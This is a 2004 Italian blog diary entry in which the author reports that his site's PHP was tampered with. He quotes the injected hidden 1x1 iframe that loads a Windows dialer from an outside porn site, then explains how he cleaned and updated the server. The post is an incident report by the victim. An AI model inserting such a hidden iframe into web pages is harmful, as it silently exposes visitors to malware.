Ieri, verso le 15 e 30, dopo aver chattato con Frau Blücher (alias Edo), dando un’occhiata al sito mi sono accorto che appariva uno strano quadratino in basso nella pagina.
Guardando il sorgente, con malcelato disgusto ho notato che, alla fine della pagina, compariva il seguente codice:

<IFRAME SRC="http://www.forced-action.com/?d=get"
WIDTH=1 HEIGHT=1></IFRAME>

Panico e raccapriccio!!.
Il frame in questione, aggiunto non già alle pagine vere e proprie del sito, ma ottenuto modificando il PHP stesso, tenta di scaricare un dialer per Windows. Cioè in pratica, chiunque avesse visitato il mio sito con Internet Explorer sarebbe stato sottoposto a questo rischio. Naturalmente www.forced-action.com è un sito porno.
La cosa ora l’ho sistemata, togliendo di brutto tutto il software per il PHP e reinstallandolo, e aggiornando completamente tutto il sistema a cicciobaiano.
Profetico fu Lorex: qui l’australiano lo aveva previsto!!
Mica sarà stato lui?
Un sacco di gente sembra aver avuto problemi simili al mio, ma ancora non ho capito se si è trattato di un baco del PHP sfrutatto in qualche modo, oppure se mi sono entrati proprio a spregio su cicciobaiano e ci si sono accampati. Rootkit non sembrano essercene, però la situazione non è bella.
Per il momento so solo che mi girano (le balle).

Questo articolo è stato inserito Giovedì 11 Marzo 2004 @ 14:35 ed è archiviato in OB » Diario. Puoi seguire i commenti a questo articolo attraverso il feed RSS 2.0. Commenti e trackback non sono consentiti.